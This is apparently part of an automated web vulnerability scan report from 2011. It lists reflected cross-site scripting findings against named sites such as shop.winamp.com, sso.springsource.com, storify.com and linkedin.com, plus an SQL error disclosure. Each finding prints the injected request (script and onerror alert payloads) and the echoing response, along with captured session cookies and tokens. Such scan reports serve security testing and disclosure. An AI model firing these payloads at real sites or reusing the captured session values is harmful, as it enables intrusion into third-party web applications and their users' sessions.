Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=67280341872,0)
Date: Sun, 27 Feb 2011 17:47:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 14076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?94384-->4321560c01e=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911800&StyleVersion=3&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ProductInterstitialDetailsPage
...[SNIP]...

3.108. https://shop.winamp.com/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.winamp.com
Path:   /store

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage&741fc-->4ffb80c87d5=1 HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114525015766,0)
Date: Sun, 27 Feb 2011 17:47:47 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 101351


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?741fc-->4ffb80c87d5=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=QuickBuyCartPage"-->
...[SNIP]...

3.109. https://sso.springsource.com/cas/CSS/style-local.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sso.springsource.com
Path:   /cas/CSS/style-local.css

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cas/CSS/style-local.css?95a9b--><script>alert(1)</script>9b4f5397ba5=1 HTTP/1.1
Host: sso.springsource.com
Connection: keep-alive
Referer: https://sso.springsource.com/cas/login
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7C9BC52425484180BE814300480016B9; SESS708c3152436f834213664fa2546e7125=uh2urvu3ima6n61ue8i3usr4c5; _mkto_trk=id:649-KCC-493&token:_mch-springsource.com-1298990705899-69442

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 15:06:37 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 6218
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
   <head>
    <title>CAS &#8
...[SNIP]...
<a href="login?95a9b--><script>alert(1)</script>9b4f5397ba5=1&locale=en">
...[SNIP]...

3.110. https://sso.springsource.com/cas/login [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sso.springsource.com
Path:   /cas/login

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cas/login?38852--><script>alert(1)</script>f4d8a81df54=1 HTTP/1.1
Host: sso.springsource.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=33AC2E0E7EBEB877D285F60EA5D20EF4; SESS708c3152436f834213664fa2546e7125=uh2urvu3ima6n61ue8i3usr4c5; _mkto_trk=id:649-KCC-493&token:_mch-springsource.com-1298990705899-69442

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 15:05:50 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: JSESSIONID=677EA4F31D65A535E2F36786C50B39C6; Path=/cas; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 6218
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
   <head>
    <title>CAS &#8
...[SNIP]...
<a href="login?38852--><script>alert(1)</script>f4d8a81df54=1&locale=en">
...[SNIP]...

3.111. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storify.com
Path:   /klout/contest-winners-how-do-you-use-your-klout-for-good.json

Request

GET /klout/contest-winners-how-do-you-use-your-klout-for-good.json?callback=cbcontestwinnershowdoyouuseyourkloutforgood6dcec<script>alert(1)</script>25335923af5 HTTP/1.1
Host: storify.com
Proxy-Connection: keep-alive
Referer: http://klout.com/blog/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _sess=eyJpZCI6ImU5MjY1MTcxYmFmZjE3NGU0Yzc4NGVjY2E3YWQiLCJsYXN0QWNjZXNzIjoxMjk4OTg3MTY5NjUyLCJhdXRoIjp7fX0!56b75e32d6a0f727bda3501f38f5f4f2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=100
Content-Type: application/json
Content-Length: 26197
Date: Tue, 01 Mar 2011 14:12:37 GMT
X-Varnish: 634703163
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

cbcontestwinnershowdoyouuseyourkloutforgood6dcec<script>alert(1)</script>25335923af5({
"editors": null,
"topics": null,
"published_at": 1297465279,
"permalink": "http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good",
"shorturl": "http://sfy.c
...[SNIP]...

3.112. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good/record/view [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storify.com
Path:   /klout/contest-winners-how-do-you-use-your-klout-for-good/record/view

Request

GET /klout/contest-winners-how-do-you-use-your-klout-for-good/record/view?callback=jsonp12989872239602281e<script>alert(1)</script>89c1f6018f3 HTTP/1.1
Host: storify.com
Proxy-Connection: keep-alive
Referer: http://klout.com/blog/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _sess=eyJpZCI6ImU5MjY1MTcxYmFmZjE3NGU0Yzc4NGVjY2E3YWQiLCJsYXN0QWNjZXNzIjoxMjk4OTg3MTY5NjUyLCJhdXRoIjp7fX0!56b75e32d6a0f727bda3501f38f5f4f2

Response

HTTP/1.1 200 OK
Content-Type: application/json
Set-Cookie: _sess=eyJpZCI6ImU5MjY1MTcxYmFmZjE3NGU0Yzc4NGVjY2E3YWQiLCJsYXN0QWNjZXNzIjoxMjk4OTg4NzUzNTI2LCJhdXRoIjp7fX0!0dd3f6b28750027994bad4092a66269a; httpOnly; path=/
Content-Length: 77
Date: Tue, 01 Mar 2011 14:12:33 GMT
X-Varnish: 634703140
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

jsonp12989872239602281e<script>alert(1)</script>89c1f6018f3("Recorded view")

3.113. http://REDACTED/CNT/iview/302784236/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /CNT/iview/302784236/direct

Request

GET /CNT/iview/302784236/direct;wi.125;hi.125/01/773834229?click=http://at.atwola.com/adlink/5113/1838221/0/6/AdId=1473155;BnId=1;itime=773834229;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311143;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&4debd"><script>alert(1)</script>b38d3c655df=1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=FA3AE6176FAC4414AD6FC26C726B4B15; AA002=1297806090-11017856; ach00=9cc2/1c4e; ach01=158f3cc/1c4e/2ac3a8d/9cc2/4d6263ca

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 02:31:24 GMT
Connection: close
Content-Length: 597

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/203665251/302784236/direct;wi.125;hi.125/01" onclick="(new Image).src='http://at.atwola.com/adlink/5113/1838221/0/6/AdId=14731
...[SNIP]...
2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311143;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&4debd"><script>alert(1)</script>b38d3c655df=1http://t.redcated'">
...[SNIP]...

3.114. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Request

GET /buttons/count?url=http%3A//techcrunch.com/classics/12603<script>alert(1)</script>368df4f71e6 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/classics/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 27 Feb 2011 02:33:09 GMT
Via: NS-CACHE: 100
Etag: "d22d498f927e3a9e446e0238dde9829118d3ff60"
Content-Length: 116
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sun, 27 Feb 2011 02:43:08 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://techcrunch.com/classics/12603<script>alert(1)</script>368df4f71e6", "diggs": 0});

3.115. http://www.business-software.com/top-10-web-content-management-vendors.php [gclid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw887e2"><script>alert(1)</script>3846485b49a HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=tn6mr2tkpge0hm9j073mo3abd6; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw887e2"><script>alert(1)</script>3846485b49a">
...[SNIP]...

3.116. http://www.business-software.com/top-10-web-content-management-vendors.php [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system31949"><script>alert(1)</script>6472702855d&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=tf092k3rbif117di4fkh2tgt53; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system31949"><script>alert(1)</script>6472702855d&gclid=CNHU87X6pqcCFVln5QodaVjCBw">
...[SNIP]...

3.117. http://www.business-software.com/top-10-web-content-management-vendors.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw&e4664"><script>alert(1)</script>215d5cf1a41=1 HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=56tm98dg8f04is4dfv793tcde1; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw&e4664"><script>alert(1)</script>215d5cf1a41=1">
...[SNIP]...

3.118. http://www.business-software.com/top-10-web-content-management-vendors.php [track parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Request

GET /top-10-web-content-management-vendors.php?track=12158831c"><script>alert(1)</script>0aa3cd70274&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=cbc0c1flt61g7ei5pts0ddp3v3; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=12158831c"><script>alert(1)</script>0aa3cd70274&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw">
...[SNIP]...

3.119. http://www.business-software.com/top-10-web-content-management-vendors.php [traffic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearchc411b"><script>alert(1)</script>5975ff9a4a8&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=3csq33e05pn8tl46hm7ti7hj44; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearchc411b"><script>alert(1)</script>5975ff9a4a8&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw">
...[SNIP]...

3.120. http://www.linkedin.com/cws/share-count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /cws/share-count

Request

GET /cws/share-count?url=http%3A%2F%2Fwww.project-syndicate.org%2Fcommentary%2Fashour1%2FEnglishbf915<img%20src%3da%20onerror%3dalert(1)>77ba82f09ef HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:1083319264699442203"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8qHmbJnGz3ALaeEKNDhv6Mnph3zq5ejKEjY-bzJWaTAdnP_K27P2mp:1298773233:7ca8bc841c7b778fb2296ec1656d588ca5376bc7"; Version=1; Max-Age=1799; Expires=Sun, 27-Feb-2011 02:50:32 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/
Set-Cookie: bcookie="v=1&b9beeacf-d5b5-4c7b-8122-9094af2abc48"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Sun, 27 Feb 2011 02:20:33 GMT
Content-Length: 151

IN.Tags.Share.handleCount({"count":0,"url":"http://www.project-syndicate.org/commentary/ashour1/Englishbf915<img src=a onerror=alert(1)>77ba82f09ef"});

3.121. http://www.montrealkiosk.com/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.montrealkiosk.com
Path:   /directory.php

Request

GET /directory.php?name=Arts%20&%20Entertainment=3&categoryId=6a82d<a>71b105b97ac HTTP/1.1
Host: www.montrealkiosk.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:03:11 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 1324

mysql error: [1054: Unknown column '6a82d' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 6a82d<a>71b105b97ac ORDER BY name ASC")
<pre align=left> &nbsp; &
...[SNIP]...

3.122. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture71102--><script>alert(1)</script>ab500cf3d8b/togaf8-doc/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:11 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4270

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
